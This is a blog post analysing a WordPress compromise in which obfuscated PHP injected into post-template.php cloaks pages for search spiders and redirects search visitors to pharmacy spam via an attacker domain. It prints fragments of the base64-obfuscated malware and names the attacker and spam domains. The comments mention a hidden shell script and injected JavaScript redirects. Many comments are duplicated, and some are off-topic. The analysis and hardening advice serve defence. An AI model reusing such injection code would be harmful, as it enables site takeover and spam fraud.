WordPress Under Attack

Note: followup to this entry here

A couple of weeks ago, a good friend of mine who runs a number of WordPress blogs received an email from Google. The email told him that Google had delisted his entire site from its search engines for pharmacy spam.

Now, his site is a collection of short stories and blogs about movies he’s making, with sections about filmmaking and special effects on the cheap, so the notion that it was being used to distribute pharmacy spam was a bit…surprising. Especially when the site appeared just fine to anyone who visited it.

I offered to take a look at the site, and what I found is a complex, rapidly-evolving attack against WordPress installations that’s highly sophisticated, difficult to detect, and difficult to defend against. It is currently exploiting the most up-to-date version of WordPress with all current patches applied, and as of the time of this writing it’s still ongoing.


When my friend was first notified of being delisted from Google, he looked at his site using an FTP program. One of the very first things he noticed is that the WordPress install directories had all been duplicated, with the duplicates having “.old” appended to the name.

Careful examination of each WordPress install folder and its corresponding .old folder revealed a difference in a key file called “post-template.php”, which is part of the core of WordPress and lives in the WordPress wp-includes directory. This file is responsible for taking a blog entry from the database, formatting it, and passing it along to the template.

As of WordPress 3.2.1, the post-template.php file is supposed to be 42,164 bytes long. The post-template.php file in the hacked installs was more than twice as big–89,524 bytes long. I took a look inside the modified post-template.php file and found that it had been extensively modified by the addition of a great deal of heavily obfuscated code.

Cut for detailed technical analysis of the modified WordPress file

The function of the post-template.php file is documented in detail on the WordPress site here. Essentially, what it does is it fetches a particular blog entry, including associated information (the title, the post ID, whether the post is password protected, and so on). The main WordPress loop uses this file to fetch each post and then display it to a Web site user.

The hacked post-template.php had been modified with the addition of hundreds of lines of code that looks like gibberish. A sample of the additional code looks something like this:

$GLOBALS[‘_486621212_’]=Array(base64_decode(‘ZXJyb3Jf’ .’c’ .’mVwb’ .’3J’ .’0aW5n’),base64_decode(” .’Y3′ .’V’ .’ybF9pbml’ .’0′),base64_decode(‘Y3′ .’V’ .’ybF9zZXRvcHQ=’),base64_decode(‘YX’ .’J’ .’yYXlfZ’ .’G’ .’l’ .’mZl9rZXk=’),base64_decode(‘YXJy’ .’YXl’ .’fZ’ .’GlmZl9′ .’r’ .’ZXk=’),base64_decode(‘Y3VybF9′ .’zZ’ .’X’ .’R’ .’vcHQ=’),base64_decode(‘Zmx’ .’vY2s=’),base64_decode(‘Zmx’ .’vb3I=’),base64_decode(‘Y3V’ .’y’ .’bF’ .’9′ .’leG’ .’Vj’),base64_decode(‘Y3V’ .’ybF9′ .’j’ .’b’ .’G9zZ’ .’Q=’ .’=’),base64_decode(‘aW5f’ .’YXJyYXk=’),base64_decode(” .’cH’ .’Jl’ .’Z19y’ .’ZXBsYWNl’),base64_decode(‘bXRfcmFu’ .’ZA==’),base64_decode(” .’aW1hZ’ .’2Vjb3′ .’B5b’ .’WV’ .’yZ2V’ .’n’ .’c’ .’mF’ .’5′),base64_decode(‘Y’ .’XJyYXlfa2V’ .’5X’ .’2′ .’V’ .’4a’ .’XN0cw==’),base64_decode(‘dXJsZW5j’ .’b2R’ .’l’),base64_decode(” .’aW5fY’ .’XJyY’ .’Xk=’),base64_decode(‘dXJsZW5jb2Rl’),base64_decode(‘dXJ’ .’s’ .’ZW5jb2R’ .’l’),base64_decode(‘dX’ .’JsZW5jb2R’ .’l’),base64_decode(” .’dXJsZW5jb’ .’2Rl’),base64_decode(‘c’ .’3′ .’Ryd’ .’G9sb’ .’3d’ .’lcg==’),base64_decode(‘c3RycmNocg==’),base64_decode(‘aGVh’ .’ZGVy’),base64_decode(” .’c’ .’H’ .’JlZ1′ .’9t’ .’Y’ .’XR’ .’jaA==’),base64_decode(” .’cHJlZ’ .’19’ .’tYX’ .’RjaA==’),base64_decode(‘aG’ .’Vh’ .’Z’ .’GVy’),base64_decode(” .’aGVhZGV’ .’y’),base64_decode(‘dXJ’ .’sZW5jb2Rl’),base64_decode(‘dXJsZW5jb2Rl’),base64_decode(‘dXJ’ .’sZ’ .’W5jb2′ .’Rl’),base64_decode(‘aW1h’ .’Z2V’ .’jb’ .’3′ .’B5c’ .’mV’ .’zaX’ .’plZ’ .’A==’)); ?>
function _1561294298($i){$a=Array(” .’OC4′ .’2′ .’L’ .’jQ4′,’N’ .’jIuMTcyLj’ .’E5OQ==’,’N’ .’jI’ .’uMjcuNTk=’,’Nj’ .’Mu’ .’MTYzLjEwMg=’ .’=’,” .’NjQuMTU3′ .’LjEzNw==’,” .’N’ .’j’ .’QuMTU’ .’3LjEzOA=’ .’=’,” .’NjQuMj’ .’MzLjE3Mw=’ .’=’,’NjQuNjguODA’ .’=’,’Nj’ .’Q’ .’uNjguODE=’,’NjQuNjgu’ .’ODI=’,’NjQuNjguOD’ .’M’ .’=’,’NjQuNj’ .’g’ .’uO’ .’D’ .’Q=’,’NjQ’ .’uN’ .’jguODU=’,’N’ .’jQuNjgu’ .’ODY=’, …

$GLOBALS[‘_486621212_’]=Array(error_reporting, curl_init, curl_setopt, array_diff_key, array_diff_key, curl_setopt, flock, floor, curl_exec, curl_close, in_array, preg_replace, mt_rand, imagecopymergegray, array_key_exists, urlencode, in_array, urlencode, urlencode, urlencode, urlencode, strtolower, strrchr, header, preg_match, preg_match, header, header, urlencode, urlencode, urlencode, imagecopyresized ?>

The second array is huge, containing over a thousand elements. Some of these elements are numbers: ‘8.6.48’, ‘62.172.199’, ‘62.27.59’, ‘63.163.102’, ‘64.157.137’, ‘64.157.138’, ‘64.233.173’, ‘64.68.80’, ‘64.68.81’. Some are parameters to PHP function calls: ‘HTTP_HOST’, ‘REQUEST_URI’, ‘QUERY_STRING’, ‘xcabcz’, ‘ok!’, ‘HTTP_HOST’, ‘&page=’, ‘REQUEST_URI’, ‘&ip=’, ‘&agent=’, ‘HTTP_USER_AGENT’, ‘1’, ‘Cache-Control: no-cache, no-store, must-revalidate’, ‘/live|msn|yahoo|google|ask|aol/’, ‘HTTP_REFERER’. Most are keywords related to pharmacy spam…hundreds and hundreds of them.

Once these arrays are built and the function to decode them is established, the actual code that’s added to post-template.php looks like this:

php $GLOBALS[‘_486621212_’][0](round(0));$_0=array(_1561294298(0),_1561294298(1),_1561294298(2),_1561294298(3),_1561294298(4),_1561294298(5),_1561294298(6),_1561294298(7),_1561294298(8),_1561294298(9),_1561294298(10),_1561294298(11),_1561294298(12),_1561294298(13),_1561294298(14),_1561294298(15),_1561294298(16),_1561294298(17),_1561294298(18),_1561294298(19),_1561294298(20),_1561294298(21),_1561294298(22),_1561294298(23),_1561294298(24),_1561294298(25),_1561294298(26),_1561294298(27),_1561294298(28), …

php error_reporting(round(0));

$_0=array(‘8.6.48′,’62.172.199′,’62.27.59′,’63.163.102′,’64.157.137′,’64.157.138′,’64.233.173′,’64.68.80′,’64.68.81′,’64.68.82’,…

The overall intention of the modified post-template.php file is to make decisions about what action to take based on the browser type, IP address, and search engine keywords the visitor’s browser presents. The process looks something like this:

It looks at the array of partial IP addresses it has built to see if the incoming request is from one of those address ranges. If it is, it looks for the “keyword” HTTP header. If the keyword header is set to “xcabcz” then it prints “OK”.

If either or both of those things are not true, it looks to see if the request is a search engine spider. If it is, it fetches a page from a specially crafted URL at http://googl-analize.in/, and serves up that page.


*** WARNING *** WARNING *** WARNING ***

The Web site at googl-analize.in is still active as of the time of this writing. If it doesn’t see the correct specially crafted HTTP headers, as of this moment it serves up a blank page. However, this domain is being used as part of a coordinated attack against WordPress users. I don’t know what else it does. It may look for vulnerable browsers to exploit and/or take other malicious actions. I do not recommend visiting it.


If the browser is a regular user instead of a spider, it looks to see where the visitor came from. If the visitor came from a search engine, it looks to see if the visitor was searching for any of the hundreds of pharma-spam-related keywords in its list. If the answer is “yes,” the visitor is sent to a custom URL string made by taking http://googl-analize.in/red and appending to it a number of parameters that include the visitor’s IP address, browser type, search engine keywords, and other information. The visitor is then sent to this URL, which redirects the visitor to a pharmacy spam page. The pharmacy spam page changes often; when I first started examining this attack, it was http://www.alltabstore.com/?a=7109. I’ve seen it redirect to a number of other domains as well. I don’t know if the domain being redirected to is chosen from a list of targets randomly, or if there’s a pattern to what the destination is.

The first step is interesting. The attack code contains a list of 240 partial IP addresses, such as 8.6.48, 62.172.199, and 62.27.59. If the IP address of the visitor to the site is in the range of any of these 240 partial addresses, the hostile code looks at the browser query string. If it is set to “xcabcz” the attack code presents a blank page that says “ok!”.

I’m not quite sure what the purpose of this is. It may represent a first attempt at implementing a mechanism to take control of compromised WordPress sites. At the moment, it’s limited to simply looking for IP address ranges and commands embedded in the browser query string, but doesn’t do anything except for printing “ok!”. This may be nothing more than a way to confirm that a site’s been compromised, or it may be a test pilot for a command interpreter that allows for remote control of a site.

There is also a simple mechanism in place for getting updates to the list of keywords from googl-analize.in.


This attack appears to be related to a similar attack on WordPress sites that have been occurring earlier this year. Those attacks are documented here and here. Those attacks are different from this attack in a couple of respects: they don’t involve creating a backup copy of attacked WordPress directories; and they do involve modification of the WordPress database, which this attack seems not to.

However, they are similar in some important respects. They involve creating arrays of base64-encoded PHP function names to obfuscate the attack code (the earlier attacks put these arrays into the WordPress database; this attack builds it in PHP). I have not studied those attacks, so I don’t know if they have any sort of remote command functionality or not, or if they redirect users to the same Web site.

Most worrying, though, nobody is sure how the attacks are taking place. Securing an attacked WordPress install appears to be very difficult to do.

My friend decided to wipe the affected WordPress installs completely, on the grounds that nuking from orbit is the only way to be sure. He deleted the directories, deleted the WordPress databases (after exporting the text of each of his blog posts to XML), and re-uploaded the whole shebang.

Within minutes, the WPinstallations were compromised again. He did this several times, and each time, within moments of setting up a new WordPress install, it was compromised. This was after creating entirely new databases with different passwords, nuking his FTP accounts and setting up new accounts with very strong passwords, and even running virus scans on his local machine to rule out a password-stealing virus or keylogger on his machine.

There are a few possibilities that I have considered that might account for the attacks:

– A zero-day vulnerability (and a big one!) in WordPress;

– A brute-force FTP attack on sites using WordPress;

– A server-side vulnerability, such as an exploit in Web hosting control software a la the iPower Web hack a few years back.

An FTP attack is possible, though it seems less likely since my friend changed his passwords and scanned for keylogging malware. It’s hypothetically possible he’s infected with an FTP keylogger that his scans didn’t find, though I think it’s unlikely.

The folks responsible for WordPress are maintaining that these attacks are not exploiting any weakness in any of their code, but rather are exploiting insecure configurations of shared hosting providers. They claim that improperly secured Web hosting servers are allowing users of one account on the server to modify accounts belonging to other users on the server. This seems plausible, given that not all WordPress sites appear to be affected; I run about a dozen, and I have not been hit so far. (Of course, I’m also on a Mac, so if there is FTP keylogging software floating around out there, I probably can’t be infected by it.) I have seen attacks against WordPress installs on some hosting providers, like Dreamhost and Liquid Web, but have not yet seen any on other hosting providers, like Hostgator.

They recommend hardening WordPress installs by making sure that file permissions are set properly, as outlined here.

The speed with which my friend’s site continues to be hacked when he tries to re-install may indicate an active service running on his hosting provider that automatically hacks vulnerable configurations of WordPress; I’m not sure.

Since the attack vector still is not understood. It is possible this is an attack on a zero-day flaw in WordPress.


If you run a WordPress blog, I highly, highly recommend you do the following:

– Make sure it is updated to the latest version. This is absolutely critical. WordPress is a favorite target of attacks. Fortunately, it’s easy; there’s an automatic “Update Now” button on the Dashboard.

– Harden WordPress as described in the link above, paying special attention to file permissions. By default, WordPress doesn’t install with the tightest possible permissions. On a shared server, this is an essential security basic.

– Use strong FTP passwords and WP admin passwords.

– Remove unneeded theme files.

– Look at your site in Google by typing site:yourwebdomain.com into a Google search. If you see a lot of pharmacy-related words appear as your site description, you’ve been hacked.

– If you are on a shared hosting server, find out if your hosting provider is using suexec, which is an Apache web hosting mod that can help mitigate against attacks from other users on the server.

I am continuing to explore this attack and will probably write more if and when I learn anything new.

66 thoughts on “WordPress Under Attack

  1. @theta_g: it sounds like this is only affecting local wordpress.org installations. You should be able to use wordpress.com without trouble (if that’s what you mean by “returning to WordPress”).

    • I suppose I -could- conceal wordpress.org underneath theta-g.com the way I’m doing now with Tumblr but I’ve already got some paid up web hosting that’s very WordPress friendly. As for LiveJournal, this is the first engaging experience I’ve had here in months 🙂

      • It is at least in theory possible to set up a secure WordPress install on your own server that won’t get pwn3d, though I do advise you to carefully check all file permissions after the install. The more I investigate this attack, the more it seems that the problem stems from making the files writable to other users on the server. It’s possible there still may be security issues present for some hosting configurations–I’m in the process of building a list of hacked WordPress installs, and so far it seems a disproportionate number of them are hosted on Dreamhost–but careful attention to the permissions on the files does seem to help.

        More worringly, I’m seeing the same attack against popular server software packages other than WordPress. I’ll be writing more about that as I discover more.

  2. @theta_g: it sounds like this is only affecting local wordpress.org installations. You should be able to use wordpress.com without trouble (if that’s what you mean by “returning to WordPress”).

  3. I suppose I -could- conceal wordpress.org underneath theta-g.com the way I’m doing now with Tumblr but I’ve already got some paid up web hosting that’s very WordPress friendly. As for LiveJournal, this is the first engaging experience I’ve had here in months 🙂

  4. Thanks for the heads up. I have checked both of my WordPress installations, and they are clean. (I discovered I hadn’t backed them up in over a month and took care of that, too, oi!)

  5. Thanks for the heads up. I have checked both of my WordPress installations, and they are clean. (I discovered I hadn’t backed them up in over a month and took care of that, too, oi!)

  6. It is at least in theory possible to set up a secure WordPress install on your own server that won’t get pwn3d, though I do advise you to carefully check all file permissions after the install. The more I investigate this attack, the more it seems that the problem stems from making the files writable to other users on the server. It’s possible there still may be security issues present for some hosting configurations–I’m in the process of building a list of hacked WordPress installs, and so far it seems a disproportionate number of them are hosted on Dreamhost–but careful attention to the permissions on the files does seem to help.

    More worringly, I’m seeing the same attack against popular server software packages other than WordPress. I’ll be writing more about that as I discover more.

  7. One of the things that I am considering is that my FTP password on those sites was brute-forced. The new password, however, with the new installations, was nun’s-fanny-tight.

    A thing my host pointed out was that in one of the “.old” directories was a PHP script that basically opened a all-you-can-eat shell into my accounts. The intriguing thing about this (or “clever,” if you prefer) is that the instant the “.old” directories were built, those directories were EXCLUDED from the automatic updating my proper directories used. That means that the “.old” directories were snapshots of an older (and less secure) installation of WordPress that the attacker could use and reuse like a hippie’s grocery sack. The shell script was hidden inside a disused and (of course) out-of-date theme directory (which is why I now delete all unused themes).

    • I do not KNOW it was brute-forced, but this seems like a reasonable hypothesis.

      The Blinkspace installation has gone well, but I installed it into a new directory, and performed all the hardening steps and THEN imported the previous XML content, and THEN installed a permanent redirect in my .htaccess file.

      I’ve let it “simmer” for a week, so my next step is to dump the database contents and go through it manually, looking for pharma-spam data.

    • Total number of installations compromised was eight, across three different domains under the same FTP login.

      As far as I know, the only way to do this is either by having my FTP password, or by having some sort of access other than that, such as a lateral drive from another account on the same server, or some other piece of shell code.

  8. One of the things that I am considering is that my FTP password on those sites was brute-forced. The new password, however, with the new installations, was nun’s-fanny-tight.

    A thing my host pointed out was that in one of the “.old” directories was a PHP script that basically opened a all-you-can-eat shell into my accounts. The intriguing thing about this (or “clever,” if you prefer) is that the instant the “.old” directories were built, those directories were EXCLUDED from the automatic updating my proper directories used. That means that the “.old” directories were snapshots of an older (and less secure) installation of WordPress that the attacker could use and reuse like a hippie’s grocery sack. The shell script was hidden inside a disused and (of course) out-of-date theme directory (which is why I now delete all unused themes).

  9. I do not KNOW it was brute-forced, but this seems like a reasonable hypothesis.

    The Blinkspace installation has gone well, but I installed it into a new directory, and performed all the hardening steps and THEN imported the previous XML content, and THEN installed a permanent redirect in my .htaccess file.

    I’ve let it “simmer” for a week, so my next step is to dump the database contents and go through it manually, looking for pharma-spam data.

  10. Total number of installations compromised was eight, across three different domains under the same FTP login.

    As far as I know, the only way to do this is either by having my FTP password, or by having some sort of access other than that, such as a lateral drive from another account on the same server, or some other piece of shell code.

  11. Hate to think it’s a Dreamhost issue since they’ve been literally a dream for years. If you haven’t already brought this post to their attention I think I would be compelled to, no?

  12. Can ou do me a huge favor and send me examples of the compromised HTML and php files to franklin (at) franklinveaux.com? I’m seeing identical attacks with the same pattern of redirects all over the place all of a sudden, including on sites that aren’t running WordPress. I’d love to be able to compare the attack code on non-WordPress sites to the code on WP sites. It’d really help illuminate what’s happening.

      • If this (and related) issues get assigned a public ticket at Dreamhost, I’d appreciate it if the URL(s) could be shared.

        This whole conversation needs to be happening over at Dreamhost now if the scale of the problem is as significant as asserted.

        • I’m seeing a disproportionate number of hacked sites on Dreamhost, though it’s not clear to me at the moment whether that’s because Dreamhost has a problem or it’s simply that Dreamhost is larger than other hosts. I’m seeing quite a few other hosts have this issue, too. Some of the hosting companies that are hosting hacked sites are quite small, so it’s possible they’re actually downstreams of, or resellers of, Dreamhost or some other large hosting company.

          It’s definitely not Dreamhost-only, though. I’ve found one hacked site hosted at 1&1, one on The Planet, and another few sites hosted on an Australian ISP, What, if anything, these ISPs have in common still isn’t clear, aside from the fact that they’re all shared hosting servers.

          I’m surprised by how little discussion I’m seeing about this. The attack is widespread, but it seems each affected person and/or ISP is treating it like it’s an isolated attack. Nobody seems to be discussing the fact that it’s not random; it’s coordinated and it’s happening on a very large scale. Each ISP seems to regard an affected site as a one-off incident; I’m not seeing any signs that anyone is either looking at it fom a network security standpoint or talking to other ISPs about it.

  13. Can ou do me a huge favor and send me examples of the compromised HTML and php files to franklin (at) franklinveaux.com? I’m seeing identical attacks with the same pattern of redirects all over the place all of a sudden, including on sites that aren’t running WordPress. I’d love to be able to compare the attack code on non-WordPress sites to the code on WP sites. It’d really help illuminate what’s happening.

  14. If this (and related) issues get assigned a public ticket at Dreamhost, I’d appreciate it if the URL(s) could be shared.

    This whole conversation needs to be happening over at Dreamhost now if the scale of the problem is as significant as asserted.

  15. I’m seeing a disproportionate number of hacked sites on Dreamhost, though it’s not clear to me at the moment whether that’s because Dreamhost has a problem or it’s simply that Dreamhost is larger than other hosts. I’m seeing quite a few other hosts have this issue, too. Some of the hosting companies that are hosting hacked sites are quite small, so it’s possible they’re actually downstreams of, or resellers of, Dreamhost or some other large hosting company.

    It’s definitely not Dreamhost-only, though. I’ve found one hacked site hosted at 1&1, one on The Planet, and another few sites hosted on an Australian ISP, What, if anything, these ISPs have in common still isn’t clear, aside from the fact that they’re all shared hosting servers.

    I’m surprised by how little discussion I’m seeing about this. The attack is widespread, but it seems each affected person and/or ISP is treating it like it’s an isolated attack. Nobody seems to be discussing the fact that it’s not random; it’s coordinated and it’s happening on a very large scale. Each ISP seems to regard an affected site as a one-off incident; I’m not seeing any signs that anyone is either looking at it fom a network security standpoint or talking to other ISPs about it.

    • The ones that have been hit yep. Archaic but they were mostly placeholder sites in development. No Joomla, No zencart, no wordpress. I even double checked to see what databases I had on the account (though these html and php sites didn’t access them, I disabled the users and the files still got compromised).

      • Well, I had databases and only one user on them, but the shell PHP file (if I understand them) basically allowed full unfettered access to everything without even once smelling like a login.

        So, if you have databases and PHP files, then you’ve got some potential holes.

        Part of our troubleshooting was doing a full export-dump of my databases, and hidden deep inside those databases was a lot of pharma-spam.

        Have you tried doing that? Do an export of all your tables to a text file and read through it manually.

        If you’re not running WordPress, then what ARE your symptoms? I mean, this is spam links placed into comments on WordPress. Where are the spam links being placed, if you don’t have WordPress which contains contaminated comments?

        • The database and the php were in a different user, but since they were under the core ‘web panel’ user dreamhost has I made the change.

          I did scan through the databases (just one of quotes from a webcomic and another of task list items) and nothing had been altered.

          The html files are getting a line injected into the beginning of the files with the javascript redirect to the spam site(s).

  16. The ones that have been hit yep. Archaic but they were mostly placeholder sites in development. No Joomla, No zencart, no wordpress. I even double checked to see what databases I had on the account (though these html and php sites didn’t access them, I disabled the users and the files still got compromised).

  17. Well, I had databases and only one user on them, but the shell PHP file (if I understand them) basically allowed full unfettered access to everything without even once smelling like a login.

    So, if you have databases and PHP files, then you’ve got some potential holes.

    Part of our troubleshooting was doing a full export-dump of my databases, and hidden deep inside those databases was a lot of pharma-spam.

    Have you tried doing that? Do an export of all your tables to a text file and read through it manually.

    If you’re not running WordPress, then what ARE your symptoms? I mean, this is spam links placed into comments on WordPress. Where are the spam links being placed, if you don’t have WordPress which contains contaminated comments?

  18. The database and the php were in a different user, but since they were under the core ‘web panel’ user dreamhost has I made the change.

    I did scan through the databases (just one of quotes from a webcomic and another of task list items) and nothing had been altered.

    The html files are getting a line injected into the beginning of the files with the javascript redirect to the spam site(s).

  19. Louisville absolutely extends beyond that bridge. One of my girlfriends and her husband lives in Louisville. I’ve driven over that bridge quite a few times!

  20. Louisville absolutely extends beyond that bridge. One of my girlfriends and her husband lives in Louisville. I’ve driven over that bridge quite a few times!

  21. You may consider looking at the safety of geographical surrounds to account for the bloodthirstiness of religion rather than the relative scarcity of food stuffs or wealth however you define that. The jungles of what is now lower Mexico are not places that anyone would survive on their own for long. Too many bloodthirsty predators and other dangers. Religions all over the world developed to give people a feeling of safety and the ability to make sense out of senseless. If giving their daughter to sacrifice meant that the rest of the family would have plenty and the animals in the forest wouldn’t eat them as they hunted then it was worth it. If someone did get eaten in the forest, maybe she wasn’t a good enough sacrifice and they needed to do better next time.

    I guess my point is that there is more to determining the pacifistic or violent nature of a culture than just level of scarcity. As you describe it, Culture side steps most of the variables by removing them from the picture.

  22. You may consider looking at the safety of geographical surrounds to account for the bloodthirstiness of religion rather than the relative scarcity of food stuffs or wealth however you define that. The jungles of what is now lower Mexico are not places that anyone would survive on their own for long. Too many bloodthirsty predators and other dangers. Religions all over the world developed to give people a feeling of safety and the ability to make sense out of senseless. If giving their daughter to sacrifice meant that the rest of the family would have plenty and the animals in the forest wouldn’t eat them as they hunted then it was worth it. If someone did get eaten in the forest, maybe she wasn’t a good enough sacrifice and they needed to do better next time.

    I guess my point is that there is more to determining the pacifistic or violent nature of a culture than just level of scarcity. As you describe it, Culture side steps most of the variables by removing them from the picture.

  23. I did see one interesting point from a Republican talking head (might have been O’Reilly), how the demographics of America are changing (as to be expected from a country
    with lots of immigration). America, today, is _not_ the America of 200 years ago. It’s evolved, it’s changed. It’s possibly not even the America of 50 years ago; equal rights acts, universal suffrage and changes in attitude have changed the landscape.

    1 million people over the age of 18 were naturalized in 2008 ( http://www.dhs.gov/xlibrary/assets/statistics/publications/natz_fr_2008.pdf ). That’s almost 1% of the voting population. It won’t take long for that level of change to tilt the balance… just enough.

    The joke is that the Republicans are running out of angry white men; the reality is that the population is shifting underneath both parties. The Democratic Party appears to be better placed, at the moment, to leverage these changes. I hope the Republicans learn this. It’s a slow change, to be sure. They could win 2014 midterms by moving further right; they might even win 2016… but ultimately they have to realise that the extremes are a thin vein that’ll be mined out, and they’ve got to return closer to center.

    One can hope, anyway. Or so this maybe-immigrant thinks 🙂

  24. I did see one interesting point from a Republican talking head (might have been O’Reilly), how the demographics of America are changing (as to be expected from a country
    with lots of immigration). America, today, is _not_ the America of 200 years ago. It’s evolved, it’s changed. It’s possibly not even the America of 50 years ago; equal rights acts, universal suffrage and changes in attitude have changed the landscape.

    1 million people over the age of 18 were naturalized in 2008 ( http://www.dhs.gov/xlibrary/assets/statistics/publications/natz_fr_2008.pdf ). That’s almost 1% of the voting population. It won’t take long for that level of change to tilt the balance… just enough.

    The joke is that the Republicans are running out of angry white men; the reality is that the population is shifting underneath both parties. The Democratic Party appears to be better placed, at the moment, to leverage these changes. I hope the Republicans learn this. It’s a slow change, to be sure. They could win 2014 midterms by moving further right; they might even win 2016… but ultimately they have to realise that the extremes are a thin vein that’ll be mined out, and they’ve got to return closer to center.

    One can hope, anyway. Or so this maybe-immigrant thinks 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.